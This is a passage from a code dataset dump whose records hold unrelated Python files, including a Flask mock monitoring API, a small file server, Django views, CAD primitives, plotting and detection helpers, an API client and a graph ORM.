root['prism_results']\n prism_clusters = prism['clusters']\n for cluster_idx, cluster in enumerate(prism_clusters):\n pathways = cluster['biosynthetic_pathways']\n pred_smiles = [pathway['smiles'] for pathway in pathways]\n for smiles in pred_smiles:\n mol = None\n try:\n mol = clean_mol(smiles)\n except ValueError:\n continue\n fp = AllChem.GetMorganFingerprintAsBitVect(\n mol, 3, nBits=1024)\n vec = get_bit_vector(fp)\n row = pd.concat([\n pd.DataFrame({'genome': genome, \n 'cluster': cluster_idx, \n 'smiles': smiles }, index=[0]),\n pd.DataFrame(vec.reshape(-1, len(vec)))], axis=1)\n res = res.append(row) \n \n # write\n output_file = io_tuple[2] + \".gz\"\n # confirm directory exists\n output_dir = os.path.dirname(output_file)\n if not os.path.isdir(output_dir): \n os.makedirs(output_dir)\n \n res.to_csv(output_file, index=False, compression='gzip')\n","sub_path":"extract-prism-fingerprints.py","file_name":"extract-prism-fingerprints.py","file_ext":"py","file_size_in_byte":2801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"626454607","text":"import pyservoce\nfrom zencad.lazifier import lazy, shape_generator, nocached_shape_generator\nfrom zencad.util import angle_pair, deg, points\n\n@lazy.lazy(cls=nocached_shape_generator)\ndef nullshape():\n return pyservoce.box(1,1,1) - pyservoce.box(1,1,1)\n\n@lazy.lazy(cls=nocached_shape_generator)\ndef box(size, arg2=None, arg3=None, center=False, shell=False):\n if arg3 == None:\n if hasattr(size, \"__getitem__\"):\n m = pyservoce.box(size[0], size[1], size[2], center)\n else:\n m = pyservoce.box(size, size, size, center)\n else:\n m = pyservoce.box(size, arg2, arg3, center)\n\n if shell:\n return m.shells()[0]\n else:\n return m\n\n\ndef cube(*args, **kwargs):\n return box(*args, **kwargs)\n\n\n@lazy.lazy(cls=nocached_shape_generator)\ndef sphere(r, yaw=None, pitch=None, shell=False):\n if yaw is not None:\n if yaw > deg(360):\n raise Exception(\"Wrong parametr `yaw`. yaw defined in [0, 2*pi]\")\n\n if pitch is not None:\n pitch = angle_pair(pitch)\n\n if pitch[0] > pitch[1]:\n raise Exception(\n \"Wrong parametr `pitch`. pitch[0] should be less then pitch[1]\"\n )\n\n if pitch[0] > pitch[1]:\n raise Exception(\n \"Wrong parametr `pitch`. pitch[0] should be less then pitch[1]\"\n )\n\n if (\n pitch[0] > deg(90)\n or pitch[1] > deg(90)\n or pitch[0] < -deg(90)\n or pitch[1] < -deg(90)\n ):\n raise Exception(\n \"Wrong parametr `pitch`. pitch[0] and pitch[1] defined in [-pi/2, pi/2]\"\n )\n\n if yaw is not None:\n if pitch is not None:\n m = pyservoce.sphere(r=r, pitch0=pitch[0], pitch1=pitch[1], yaw=yaw)\n else:\n m = pyservoce.sphere(r=r, yaw=yaw)\n\n else:\n if pitch is not None:\n m = pyservoce.sphere(r=r, pitch0=pitch[0], pitch1=pitch[1])\n else:\n m = pyservoce.sphere(r=r)\n\n if shell:\n return m.shells()[0]\n else:\n return m\n\n\n@lazy.lazy(cls=nocached_shape_generator)\ndef cylinder(r, h, center=False, yaw=None, shell=False):\n if yaw is None:\n m = pyservoce.cylinder(r=r, h=h, center=center)\n else:\n m = pyservoce.cylinder(r=r, h=h, yaw=yaw, center=center)\n\n if shell:\n return m.shells()[0]\n else:\n return m\n\n\n@lazy.lazy(cls=nocached_shape_generator)\ndef cone(r1, r2, h, center=False, yaw=None, shell=False):\n if yaw is None:\n m = pyservoce.cone(r1=r1, r2=r2, h=h, center=center)\n else:\n m = pyservoce.cone(r1=r1, r2=r2, h=h, yaw=yaw, center=center)\n\n if shell:\n return m.shells()[0]\n else:\n return m\n\n\n@lazy.lazy(cls=nocached_shape_generator)\ndef torus(r1, r2, yaw=None, pitch=None, shell=False):\n if pitch is not None:\n pitch = angle_pair(pitch)\n if yaw is not None:\n m = pyservoce.torus(\n r1=r1, r2=r2, pitch0=pitch[0], pitch1=pitch[1], yaw=yaw\n )\n else:\n m = pyservoce.torus(r1=r1, r2=r2, pitch0=pitch[0], pitch1=pitch[1])\n else:\n if yaw is not None:\n m = pyservoce.torus(r1=r1, r2=r2, yaw=yaw)\n else:\n #return pyservoce.torus(r1=r1, r2=r2)\n m = (pyservoce.torus(r1=r1, r2=r2, yaw=deg(180)) \n + pyservoce.torus(r1=r1, r2=r2, yaw=deg(180)).rotateZ(deg(180)))\n\n if shell:\n return m.shells()[0]\n else:\n return m\n\n@lazy.lazy(cls=nocached_shape_generator)\ndef halfspace():\n return pyservoce.halfspace()\n\n\n@lazy.lazy(cls=nocached_shape_generator)\ndef polyhedron(pnts, faces, shell=False):\n pnts = points(pnts)\n shl = pyservoce.polyhedron_shell(pnts, faces)\n\n if shell:\n return shl\n else:\n return shl.fill() \n\n@lazy.lazy(cls=nocached_shape_generator)\ndef make_solid(*args, **kwargs):\n return pyservoce.make_solid(*args, **kwargs)\n\n@lazy.lazy\ndef convex_hull(pnts, incremental=False, qhull_options=None):\n from scipy.spatial import ConvexHull\n\n faces = ConvexHull(pnts, incremental=False, qhull_options=None).simplices\n\n return faces\n\n@lazy.lazy(cls=shape_generator)\ndef convex_hull_shape(pnts, shell=False, incremental=False, qhull_options=None):\n from scipy.spatial import ConvexHull\n\n faces = ConvexHull(pnts, incremental, qhull_options).simplices\n m = polyhedron(pnts, faces, shell=shell)\n\n return m","sub_path":"zencad/geom/prim3d.py","file_name":"prim3d.py","file_ext":"py","file_size_in_byte":4438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"321266621","text":"#encoding:utf-8\nimport dataController \nfrom flask import *\nfrom flask import request\nfrom flask import json\nfrom flask import jsonify\nfrom flask import make_response\nimport types\nimport time\n\ntry:\n import simplejson as json\nexcept ImportError:\n import json\napp = Flask(__name__)\n\nupdate=1.0\ndlc_ret=\"old\"\nband_num=0\nlink_num=0\nlinkloss_num=0\ncap_num=0\nfirstband=2576024104\nbanddata=2576024104\n\n@app.route(\"/setfile/api//file/\")\ndef setfile(api,file):\n print(file)\n try:\n ret=dataController.setApiFile(api,file)\n if(ret==None):\n return \"ok\"\n else:\n return ret\n except:\n return \"except cause\"\n\n@app.route('/getdata', methods=['POST','GET'])\ndef predictApi(): \n if request.method == 'POST':\n #print(dir(request))\n data=request.data\n d=\"threashold_params\"\n print(json.dumps(d))\n if(data=='\"threashold_params\"'):\n b= {\"k_low_whole_usage\": 0.7001, \"k_high_whole_usage\": 1.1471, \"k_low_time\": 0.0171, \"k_high_time\": 0.0054, \"b_high\": 1.0409, \"b_low\": -1.3845}\n print(type(b))\n c=json.dumps(b)\n return c\n else:\n b= (17,70.6) \n c=json.dumps(b)\n return c\n \n else:\n return \"this is get method\"\n\n\n\n@app.route('/api/bandwidth/', methods=['POST','GET'])\ndef bandwidthApi(): \n if request.method == 'POST':\n data=request.data\n \n #global band_num\n global firstband \n print(data)\n print(type(data))\n print(json.loads(data)) \n if(json.loads(data)['queries'][0]['metric']=='TOPNODEBANDWIDTH.bandwidth.ha.ifHCOutOctets'):\n print(\"---------aaa\")\n tm=int(time.time())\n data=dataController.getApiData('bandswidth')\n #band_data=dataController.getApiData('banddata')\n mod_tmp=json.loads(data)\n #data_tmp=json.loads(band_data)\n print(len(mod_tmp))\n #print(len(data_tmp))\n mod_tmp[0]['dps'][tm]=firstband\n for j in range(1,len(mod_tmp)):\n #print(j)\n #mod_tmp[j]['dps'][tm]=data_tmp[band_num][j]\n mod_tmp[j]['dps'][tm]=banddata\n #band_num=band_num+1\n #if(band_num>=len(data_tmp)):\n # band_num=0\n firstband=firstband+10000000\n if(firstband>12576024104):\n firstband=banddata\n res=make_response(json.dumps(mod_tmp))\n res.headers['Content-Type']=\"application/json\"\n return res \n else:\n data=[]\n return json.dumps(data) \n else:\n return \"this is get method\"\n\n@app.route(\"/api/linkdata/\",methods=['POST','GET'])\ndef linkDataApi():\n ret='{}'\n if request.method == 'POST':\n try:\n data=request.data\n global link_num\n global linkloss_num\n tm=int(time.time())\n if(json.loads(data)['queries'][0]['metric']=='topnode_link_monitor.topnodeping.latency'):\n mod=dataController.getApiData('link')\n mod_data=dataController.getApiData('linkdata')\n print(mod)\n print(mod_data)\n mod_tmp=json.loads(mod)\n data_tmp=json.loads(mod_data)\n print(len(mod_tmp))\n for j in range(len(mod_tmp)):\n mod_tmp[j]['dps'][tm]=data_tmp[link_num][j]\n link_num=link_num+1\n if(link_num>=len(data_tmp)-1):\n link_num=0\n res=make_response(json.dumps(mod_tmp))\n res.headers['Content-Type']=\"application/json\"\n return res \n else:\n mod=dataController.getApiData('linkloss')\n mod_data=dataController.getApiData('linklossdata')\n print(mod)\n print(mod_data)\n mod_tmp=json.loads(mod)\n\n data_tmp=json.loads(mod_data)\n for j in range(len(mod_tmp)):\n mod_tmp[j]['dps'][tm]=data_tmp[linkloss_num][j]\n linkloss_num=linkloss_num+1\n if(linkloss_num>=len(data_tmp)-1):\n linkloss_num=0\n res=make_response(json.dumps(mod_tmp))\n res.headers['Content-Type']=\"application/json\"\n return res \n except Exception as e:\n print(e)\n return \"exception\"\n\n else:\n return \"this is get method\"\n\n\n@app.route(\"/api/capacity/\",methods=['POST','GET'])\ndef serviceCapacity(): \n if request.method == 'POST':\n data=request.data\n print(data)\n global cap_num\n redata=json.loads(data) \n if(redata['queries'][0]['metric']=='base.net_interface_flow_out'):\n print(\"---------aaa\")\n tm=int(time.time())\n data=dataController.getApiData('capacity')\n band_data=dataController.getApiData('capacitydata')\n print(\"ddddddd\")\n mod_tmp=json.loads(data)\n data_tmp=json.loads(band_data)\n print(len(mod_tmp))\n print(len(data_tmp))\n for j in range(len(mod_tmp)):\n mod_tmp[j]['dps'][tm]=data_tmp[cap_num][j]\n cap_num=cap_num+1\n if(cap_num>=len(data_tmp)):\n cap_num=0\n res=make_response(json.dumps(mod_tmp))\n res.headers['Content-Type']=\"application/json\"\n return res \n else:\n print(\"else\")\n data=[]\n res=make_response(json.dumps(data))\n res.headers['Content-Type']=\"application/json\"\n return res \n\n else:\n return \"this is get method\"\n\n\n@app.route(\"/bsp/node/nodestatuslist\")\ndef nodestatusApi():\n ret='{}'\n try:\n data=dataController.getApiData('nodestatus')\n print(data)\n if(type(data) is types.DictType):\n ret=json.dumps(data)\n return ret\n if(type(data) is types.StringType):\n return data\n if(type(data) is types.ListType):\n ret=json.dumps(data)\n return ret\n else:\n return '{\"status\":\"type is not string \\ dict\\list\"}'\n except:\n return \"{'status':'exception'}\"\n\n\n@app.route(\"/dlc/router/getNameidInfo/\")\ndef dlcnameidApi():\n ret='{}'\n try:\n data=dataController.getApiData('dlcnameid')\n t=int(round(time.time()*1000,0))\n print(type(data))\n if(data==''):\n return ret\n if(type(data) is types.DictType):\n print(\"aa\")\n data['ctime']=t\n ret=json.dumps(data)\n return ret\n if(type(data) is types.StringType):\n print(\"xx\")\n tmp=json.loads(data)\n for i in range(len(tmp)):\n tmp[i]['ctime']=t\n res=make_response(json.dumps(tmp))\n res.headers['Content-Type']=\"application/json\"\n return res \n if(type(data) is types.ListType):\n print(data)\n for i in range(len(data)):\n data[i]['ctime']=t\n return jsonify(json.dumps(data))\n\n else:\n return '{\"status\":\"type is not string or dict\"}'\n except Exception as e:\n print(e)\n return \"exception\"\n\n@app.route('/dlc/router/cmd/', methods=['POST','GET'])\ndef dlcresult():\n global update \n global dlc_ret\n if request.method == 'POST':\n try:\n nameid=\"init\"\n \n data = request.data\n print(data)\n print(type(data))\n # print(data[0]['cmdid'])\n dlcdata=json.loads(data)\n print(type(dlcdata)) \n print(dlcdata) \n print(\"------------\") \n if(isinstance(dlc_ret,list) and (dlc_ret[0][\"cmdid\"] == dlcdata[0][\"cmdid\"])):\n print(\"rr\")\n dlc_ret.append(dlcdata[0])\n else:\n dlc_ret=data\n \n update=time.time()\n print(update)\n nameid=dlcdata[0]['nameid']\n cmdid=dlcdata[0]['cmdid']\n ret=[{\"resultmess\": \"OK\", \"resultcode\": \"SUCCESS\", \"nameid\": nameid}]\n lastret=json.dumps(ret)\n fret=json.dumps(dlc_ret)\n file_object = open('/root/xhn/dlc_ret/'+str(cmdid), 'w')\n file_object.write(fret)\n file_object.close()\n return lastret \n return \"OK!\" \n except Exception as e:\n print(e)\n else:\n return \"mothod error\"\n\n@app.route('/dlc/result/time/
    \" % logo)\n self.response.write(\"

    \" + event + \"

    \")\n self.response.write(\"

    \" + date + \"

    \n{entries}\n
    \n\n\n\n'''\n\nclass Path(pathclass.Path):\n '''\n Add some server-specific abilities to the Pathclass\n '''\n def __init__(self, path):\n path = urllib.parse.unquote(path)\n path = path.strip('/')\n pathclass.Path.__init__(self, path)\n\n @property\n def allowed(self):\n return any(self in okay for okay in OKAY_PATHS)\n\n def anchor(self, display_name=None):\n self.correct_case()\n if display_name is None:\n display_name = self.basename\n\n if self.is_dir:\n # Folder emoji\n icon = '\\U0001F4C1'\n else:\n # Diamond emoji, because there's not one for files.\n icon = '\\U0001F48E'\n\n #print('anchor', path)\n if display_name.endswith('.placeholder'):\n a = '{icon} {display}'\n else:\n a = '{icon} {display}'\n a = a.format(\n full=self.url_path,\n icon=icon,\n display=display_name,\n )\n return a\n\n def table_row(self, display_name=None, shaded=False):\n form = '{anchor}{size}'\n size = self.size\n if size is None:\n size = ''\n else:\n size = bytestring.bytestring(size)\n\n bg = 'ddd' if shaded else 'fff';\n row = form.format(\n bg=bg,\n anchor=self.anchor(display_name=display_name),\n size=size,\n )\n return row\n\n @property\n def url_path(self):\n url = self.relative_path\n url = url.replace(os.sep, '/')\n url = '/' + url\n url = urllib.parse.quote(url)\n return url\n\nOKAY_PATHS = set(Path(p) for p in OKAY_PATHS)\n\nclass RequestHandler(http.server.BaseHTTPRequestHandler):\n def write(self, data):\n if isinstance(data, str):\n data = data.encode('utf-8')\n if isinstance(data, types.GeneratorType):\n for chunk in data:\n self.wfile.write(chunk)\n RATELIMITER.limit(len(chunk))\n else:\n self.wfile.write(data)\n\n def read_filebytes(self, path, range_min=None, range_max=None):\n #print(path)\n\n if path.is_file:\n if range_min is None:\n range_min = 0\n\n if range_max is None:\n range_max = path.size\n\n range_span = range_max - range_min\n\n #print('read span', range_min, range_max, range_span)\n f = open(path.absolute_path, 'rb')\n f.seek(range_min)\n sent_amount = 0\n while sent_amount < range_span:\n chunk = f.read(FILE_READ_CHUNK)\n if len(chunk) == 0:\n break\n\n yield chunk\n sent_amount += len(chunk)\n\n #print('I read', len(fr))\n f.close()\n\n elif path.is_dir:\n text = generate_opendir(path)\n text = text.encode('utf-8')\n yield text\n\n else:\n self.send_error(404)\n yield bytes()\n\n def do_GET(self):\n #print(dir(self))\n path = Path(self.path)\n if self.send_path_validation_error(path):\n return\n\n range_min = None\n range_max = None\n\n status_code = 200\n headers = {}\n\n if path.is_file:\n file_size = path.size\n if 'range' in self.headers:\n desired_range = self.headers['range']\n desired_range = desired_range.lower()\n desired_range = desired_range.split('bytes=')[-1]\n\n helper = lambda x: int(x) if x and x.isdigit() else None\n if '-' in desired_range:\n (desired_min, desired_max) = desired_range.split('-')\n #print('desire', desired_min, desired_max)\n range_min = helper(desired_min)\n range_max = helper(desired_max)\n else:\n range_min = helper(desired_range)\n\n if range_min is None:\n range_min = 0\n if range_max is None:\n range_max = file_size\n\n # because ranges are 0 indexed\n range_max = min(range_max, file_size - 1)\n range_min = max(range_min, 0)\n\n status_code = 206\n range_header = 'bytes {min}-{max}/{outof}'.format(\n min=range_min,\n max=range_max,\n outof=file_size,\n )\n headers['Content-Range'] = range_header\n headers['Accept-Ranges'] = 'bytes'\n content_length = (range_max - range_min) + 1\n\n else:\n content_length = file_size\n\n headers['Content-length'] = content_length\n\n mime = mimetypes.guess_type(path.absolute_path)[0]\n if mime is not None:\n #print(mime)\n headers['Content-type'] = mime\n\n self.send_response(status_code)\n for (key, value) in headers.items():\n self.send_header(key, value)\n\n d = self.read_filebytes(path, range_min=range_min, range_max=range_max)\n #print('write')\n self.end_headers()\n self.write(d)\n\n def do_HEAD(self):\n path = Path(self.path)\n if self.send_path_validation_error(path):\n return\n\n status_code = 200\n self.send_response(status_code)\n\n if path.is_dir:\n mime = 'text/html'\n else:\n mime = mimetypes.guess_type(path.absolute_path)[0]\n self.send_header('Content-length', path.size)\n\n if mime is not None:\n self.send_header('Content-type', mime)\n\n self.end_headers()\n\n def send_path_validation_error(self, path):\n if not path.allowed:\n self.send_error(403, 'Stop that!')\n return True\n return False\n\n\nclass ThreadedServer(socketserver.ThreadingMixIn, http.server.HTTPServer):\n '''\n Thanks root and twasbrillig http://stackoverflow.com/a/14089457\n '''\n pass\n\n\ndef generate_opendir(path):\n #print('Listdir:', path)\n items = os.listdir(path.absolute_path)\n items = [os.path.join(path.absolute_path, f) for f in items]\n #print(items)\n\n # This places directories above files, each ordered alphabetically\n items.sort(key=str.lower)\n directories = []\n files = []\n for item in items:\n if os.path.isdir(item):\n directories.append(item)\n else:\n files.append(item)\n\n items = directories + files\n items = [Path(f) for f in items]\n entries = []\n\n if any(path.absolute_path == okay.absolute_path for okay in OKAY_PATHS):\n # This is different than a permission check, we're seeing if they're\n # actually at the top, in which case they don't need an up button.\n pass\n else:\n entry = path.parent.table_row(display_name='up')\n entries.append(entry)\n\n shaded = True\n for item in items:\n entry = item.table_row(shaded=shaded)\n entries.append(entry)\n shaded = not shaded\n\n entries = '\\n'.join(entries)\n text = OPENDIR_TEMPLATE.format(entries=entries)\n return text\n\ndef generate_random_filename(original_filename='', length=8):\n import random\n bits = length * 44\n bits = random.getrandbits(bits)\n identifier = '{:x}'.format(bits).rjust(length, '0')\n return identifier\n\ndef main():\n server = ThreadedServer(('', int(sys.argv[1] or 32768)), RequestHandler)\n print('server starting')\n server.serve_forever()\n\nif __name__ == '__main__':\n main()\n","sub_path":"ServerReference/simpleserver.py","file_name":"simpleserver.py","file_ext":"py","file_size_in_byte":8436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"244961985","text":"from typing import Text\nfrom django.http.response import HttpResponseRedirect\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\n\nfrom form import CreateNewList\nfrom .models import ToDoList,Item\n# Create your views here.\n\ndef index(response ,id): ##First view\n ls = ToDoList.objects.get(id=id)\n\n if response.method == \"POST\":\n print(response.POST)\n if response.POST.get(\"save\"):\n for item in ls.item_set.all():\n if response.POST.get(\"c\" + str(item.id)) == \"clicked\":\n item.complete = True\n else: \n item.complete = False\n item.save()\n \n\n \n elif response.POST.get(\"New Item\"):\n txt = response.POST.get(\"content\")\n if len(txt)>2:\n ls.item_set.create(text=txt,complete=False)\n else:\n print(\"Invalid\")\n return render(response,\"main/DisplayList.html\",{\"ls\":ls})\n\ndef home(response): \n return render(response,\"main/home.html\",{})\n\ndef create(response): \n if response.method == \"POST\":\n form = CreateNewList(response.POST)\n if form.is_valid():\n n = form.cleaned_data[\"name\"]\n t = ToDoList(name=n)\n t.save()\n return HttpResponseRedirect(\"/%i\" %t.id)\n else: \n form = CreateNewList()\n\n return render(response,\"main/create.html\",{\"form\":form})\n\n\n \n","sub_path":"MyFirstSite/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"158201183","text":"from __future__ import division, print_function\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\nclass RewardViewer(object):\n def __init__(self):\n self.rewards = []\n\n def update(self, reward):\n self.rewards.append(reward)\n self.display()\n\n def display(self):\n plt.figure(num='Rewards')\n plt.clf()\n plt.title('Total reward')\n plt.xlabel('Episode')\n plt.ylabel('Reward')\n plt.plot(self.rewards)\n\n # Take 100 episode averages and plot them too\n if len(self.rewards) >= 100:\n means = np.hstack((np.zeros((100,)), np.convolve(self.rewards, np.ones((100,)) / 100, mode='valid')))\n plt.plot(means)\n else:\n plt.plot(np.zeros(np.shape(self.rewards)))\n\n plt.pause(0.001)\n plt.plot(block=False)\n","sub_path":"rl_agents/trainer/graphics.py","file_name":"graphics.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"41860150","text":"#!/usr/bin/python\n\"\"\"\nUse a classifier cascade to identify matches in a given image.\n\"\"\"\nimport cv2\n#import cv2.cv as cv\n\ndef detect(img):\n '''\n The detect function processes a file to look for matches, and returns a list\n of tuples (x,y) containing the central point of each positive detection.\n '''\n cascade = cv2.CascadeClassifier()\n cascade.load('../data/cascade/wf_cascade.xml')\n \n img_gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n rects = cascade.detectMultiScale(img_gray, scaleFactor=1.1, minNeighbors=1, minSize=(10,10), maxSize=(25,25))\n matches = []\n \n for r in rects:\n xcentre = r[0] + r[2] / 2\n ycentre = r[1] + r[3] / 2\n matches.append((xcentre,ycentre))\n \n return matches;\n \n #filtered_matches = removematches.removematches(img, matches)\n #after removing false positives\n #return filtered_matches\n\n\n \n","sub_path":"version1.2/src/cascadedetect.py","file_name":"cascadedetect.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"312842302","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.5 (3350)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build\\bdist.win32\\egg\\pelock\\aztecdecoder.py\n# Compiled at: 2016-08-08 18:04:20\n# Size of source mod 2**32: 3444 bytes\nimport struct, io, json, requests\n\nclass AZTecDecoder(object):\n API_URL = 'https://www.pelock.com/api/aztec-decoder/v1'\n _api_key = ''\n\n def __init__(self, api_key):\n \"\"\"Inicjalizacja klasy AZTecDecoder\n\n :param api_key: Klucz do uslugi WebApi\n \"\"\"\n self._api_key = api_key\n\n def decode_text(self, text):\n \"\"\"Dekodowanie zaszyfrowanej wartosci tekstowej do\n wyjsciowej tablicy w formacie JSON.\n\n :param text: Odczytana wartosc z kodem AZTEC2D w formie ASCII\n :return Rozkodowana tablica elementow JSON lub None jesli blad\n :rtype object\n \"\"\"\n params = {'command': 'decode-text', 'text': text}\n return self.post_request(params)\n\n def decode_text_from_file(self, text_file_path):\n \"\"\"Dekodowanie zaszyfrowanej wartosci tekstowej\n ze wskaznego pliku do wyjsciowej tablicy z\n formatu JSON.\n\n :param text_file_path: Sciezka do pliku z odczytana wartoscia kodu AZTEC2D\n :return Rozkodowana tablica elementow JSON lub None jesli blad\n :rtype object\n \"\"\"\n with open(text_file_path, 'r') as (f):\n text = f.read()\n if text:\n return self.decode_text(text)\n\n def decode_image_from_file(self, image_file_path):\n \"\"\"Dekodowanie zaszyfrowanej wartosci zakodowanej\n w obrazku PNG lub JPG/JPEG do wyjsciowej tablicy\n w formacie JSON.\n\n :param image_file_path: Sciezka do obrazka z kodem AZTEC2D\n :return Rozkodowana tablica elementow JSON lub None jesli blad\n :rtype object\n \"\"\"\n params = {'command': 'decode-image', 'image': image_file_path}\n return self.post_request(params)\n\n def post_request(self, params_array):\n \"\"\"Wysyla zapytanie POST do serwera WebApi\n\n :param params_array: Tablica z parametrami dla zapytania POST\n :return: Rozkodowana tablica elementow JSON lub None jesli blad\n :rtype: object\n \"\"\"\n if not self._api_key:\n return\n else:\n params_array['key'] = self._api_key\n if 'image' in params_array:\n files = {'image': open(params_array['image'], 'rb')}\n params_array.pop('image', None)\n response = requests.post(self.API_URL, files=files, data=params_array)\n else:\n response = requests.post(self.API_URL, data=params_array)\n if response and response.ok:\n return json.loads(response.text)\n return","sub_path":"pycfiles/aztecdecoder-1.0.0-py3.5/aztecdecoder.cpython-35.py","file_name":"aztecdecoder.cpython-35.py","file_ext":"py","file_size_in_byte":2837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"399883457","text":"from collections import OrderedDict\nimport inspect\nimport re\nfrom uuid import UUID\n\nfrom thunderdome import columns\nfrom thunderdome.connection import execute_query, create_key_index, ThunderdomeQueryError\nfrom thunderdome.exceptions import ModelException, ValidationError, DoesNotExist, MultipleObjectsReturned, ThunderdomeException, WrongElementType\nfrom thunderdome.gremlin import BaseGremlinMethod, GremlinMethod\n\n\n#dict of node and edge types for rehydrating results\nvertex_types = {}\nedge_types = {}\n\n\nclass ElementDefinitionException(ModelException): pass\nclass SaveStrategyException(ModelException): pass\n\n\nclass BaseElement(object):\n \"\"\"\n The base model class, don't inherit from this, inherit from Model, defined below\n \"\"\"\n\n # When true this will prepend the module name to the type name of the class\n __use_module_name__ = False\n __default_save_strategy__ = columns.SAVE_ALWAYS\n \n class DoesNotExist(DoesNotExist): pass\n class MultipleObjectsReturned(MultipleObjectsReturned): pass\n class WrongElementType(WrongElementType): pass\n\n def __init__(self, **values):\n \"\"\"\n Initialize the element with the given properties.\n\n :param values: The properties for this element\n :type values: dict\n \n \"\"\"\n self.eid = values.get('_id')\n self._values = {}\n for name, column in self._columns.items():\n value = values.get(name, None)\n if value is not None: value = column.to_python(value)\n value_mngr = column.value_manager(self, column, value)\n self._values[name] = value_mngr\n\n def __eq__(self, other):\n \"\"\"\n Check for equality between two elements.\n\n :param other: Element to be compared to\n :type other: BaseElement\n :rtype: boolean\n \n \"\"\"\n if not isinstance(other, BaseElement): return False\n return self.as_dict() == other.as_dict() and self.eid == other.eid\n\n def __ne__(self, other):\n \"\"\"\n Check for inequality between two elements.\n\n :param other: Element to be compared to\n :type other: BaseElement\n :rtype: boolean\n \n \"\"\"\n return not self.__eq__(other)\n\n @classmethod\n def _type_name(cls, manual_name):\n \"\"\"\n Returns the column family name if it has been defined, otherwise it\n creates it from the module and class name.\n\n :param manual_name: Name to override the default type name\n :type manual_name: str\n :rtype: str\n \n \"\"\"\n cf_name = ''\n if manual_name:\n cf_name = manual_name.lower()\n else:\n camelcase = re.compile(r'([a-z])([A-Z])')\n ccase = lambda s: camelcase.sub(lambda v: '{}_{}'.format(v.group(1), v.group(2).lower()), s)\n \n cf_name += ccase(cls.__name__)\n cf_name = cf_name.lower()\n if cls.__use_module_name__:\n cf_name = cls.__module__ + '_{}'.format(cf_name)\n return cf_name\n\n def validate_field(self, field_name, val):\n \"\"\"\n Perform the validations associated with the field with the given name on\n the value passed.\n\n :param field_name: The name of column whose validations will be run\n :type field_name: str\n :param val: The value to be validated\n :type val: mixed\n \n \"\"\"\n return self._columns[field_name].validate(val)\n\n def validate(self):\n \"\"\"Cleans and validates the field values\"\"\"\n for name in self._columns.keys():\n func_name = 'validate_{}'.format(name)\n val = getattr(self, name)\n if hasattr(self, func_name):\n val = getattr(self, func_name)(val)\n else:\n val = self.validate_field(name, val)\n setattr(self, name, val)\n\n def as_dict(self):\n \"\"\"\n Returns a map of column names to cleaned values\n\n :rtype: dict\n \n \"\"\"\n values = {}\n for name, col in self._columns.items():\n values[name] = col.to_database(getattr(self, name, None))\n return values\n\n def as_save_params(self):\n \"\"\"\n Returns a map of column names to cleaned values containing only the\n columns which should be persisted on save.\n\n :rtype: dict\n \n \"\"\"\n values = {}\n was_saved = self.eid is not None\n for name, col in self._columns.items():\n # Determine the save strategy for this column\n should_save = True\n\n col_strategy = self.__default_save_strategy__\n if col.has_save_strategy:\n col_strategy = col.get_save_strategy()\n\n # Enforce the save strategy\n if col_strategy == columns.SAVE_ONCE:\n if was_saved:\n if self._values[name].changed:\n raise SaveStrategyException(\"Attempt to change column '{}' with save strategy SAVE_ONCE\".format(name))\n else:\n should_save = False\n elif col_strategy == columns.SAVE_ONCHANGE:\n if was_saved and not self._values[name].changed:\n should_save = False\n \n if should_save:\n values[name] = col.to_database(getattr(self, name, None))\n \n return values\n\n @classmethod\n def create(cls, *args, **kwargs):\n \"\"\"Create a new element with the given information.\"\"\"\n return cls(*args, **kwargs).save()\n \n def pre_save(self):\n \"\"\"Pre-save hook which is run before saving an element\"\"\"\n self.validate()\n \n def save(self):\n \"\"\"\n Base class save method. Performs basic validation and error handling.\n \"\"\"\n if self.__abstract__:\n raise ThunderdomeException('cant save abstract elements')\n self.pre_save()\n return self\n\n def pre_update(self, **values):\n \"\"\" Override this to perform pre-update validation \"\"\"\n pass\n\n def update(self, **values):\n \"\"\"\n performs an update of this element with the given values and returns the saved object\n \"\"\"\n if self.__abstract__:\n raise ThunderdomeException('cant update abstract elements')\n self.pre_update(**values)\n for key in values.keys():\n if key not in self._columns:\n raise TypeError(\"unrecognized attribute name: '{}'\".format(key))\n\n for k,v in values.items():\n setattr(self, k, v)\n\n return self.save()\n\n def _reload_values(self):\n \"\"\"\n Base method for reloading an element from the database.\n \"\"\"\n raise NotImplementedError\n\n def reload(self):\n \"\"\"\n Reload the given element from the database.\n \"\"\"\n values = self._reload_values()\n for name, column in self._columns.items():\n value = values.get(name, None)\n if value is not None: value = column.to_python(value)\n setattr(self, name, value)\n return self\n\n \nclass ElementMetaClass(type):\n \"\"\"Metaclass for all graph elements\"\"\"\n \n def __new__(cls, name, bases, attrs):\n \"\"\"\n \"\"\"\n #move column definitions into columns dict\n #and set default column names\n column_dict = OrderedDict()\n \n #get inherited properties\n for base in bases:\n for k,v in getattr(base, '_columns', {}).items():\n column_dict.setdefault(k,v)\n\n def _transform_column(col_name, col_obj):\n column_dict[col_name] = col_obj\n col_obj.set_column_name(col_name)\n #set properties\n _get = lambda self: self._values[col_name].getval()\n _set = lambda self, val: self._values[col_name].setval(val)\n _del = lambda self: self._values[col_name].delval()\n if col_obj.can_delete:\n attrs[col_name] = property(_get, _set)\n else:\n attrs[col_name] = property(_get, _set, _del)\n\n column_definitions = [(k,v) for k,v in attrs.items() if isinstance(v, columns.Column)]\n column_definitions = sorted(column_definitions, lambda x,y: cmp(x[1].position, 